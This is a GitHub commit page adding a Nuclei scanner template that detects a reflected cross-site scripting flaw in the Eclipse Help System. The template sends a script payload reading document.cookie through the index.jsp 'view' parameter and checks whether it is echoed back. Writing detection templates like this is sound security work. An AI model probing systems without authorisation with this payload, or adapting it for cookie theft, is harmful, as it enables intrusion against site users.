Merge pull request #368 from projectdiscovery/eclipse-help-system-xss

Create eclipse-help-system-xss.yaml
patch-1
bauthard 2020-08-30 10:39:19 +05:30 committed by GitHub
commit 62cbf524aa
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 22 additions and 0 deletions

View File

@ -0,0 +1,22 @@
id: eclipse-help-system-xss
info:
name: Eclipse Help System RXSS vulnerability
author: pikpikcu
severity: medium
# Source:- https://github.com/pikpikcu/nuclei-templates/blob/master/vulnerabilities/eclipse-xss.yaml
requests:
- method: GET
path:
- "{{BaseURL}}/help/index.jsp?view=<script>alert(document.cookie)</script>"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<script>alert(document.cookie)</script>"
part: body